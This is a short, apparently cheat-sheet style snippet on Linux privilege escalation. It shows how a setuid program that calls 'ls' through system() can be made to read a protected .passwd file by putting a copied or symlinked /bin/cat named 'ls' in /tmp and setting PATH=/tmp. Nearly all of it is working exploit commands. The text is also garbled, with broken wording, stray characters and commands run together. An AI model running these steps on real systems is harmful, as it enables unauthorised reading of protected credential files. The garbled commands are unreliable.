# base program
int main(void){
system("ls /path/to/.passwd");return 0;}# As you as the program is executed with the āsā flag (owner rights), you can privesc by copying the program you want to impersonate
cp /bin/cat /tmp/ls
PATH=/tmp
# You can escape optionsecho'#!/bin/cat --' > /tmp/ls
chmod 755 /tmp/ls
env PATH=/tmp ./binary_setuid .passwd
Symbolic link attack
# base program
int main(void){
system("ls /path/to/.passwd");return 0;}
ln -s /bin/cat /tmp/ls
ls -l /tmp/ls
PATH=/tmp
echo$PATH
./binary1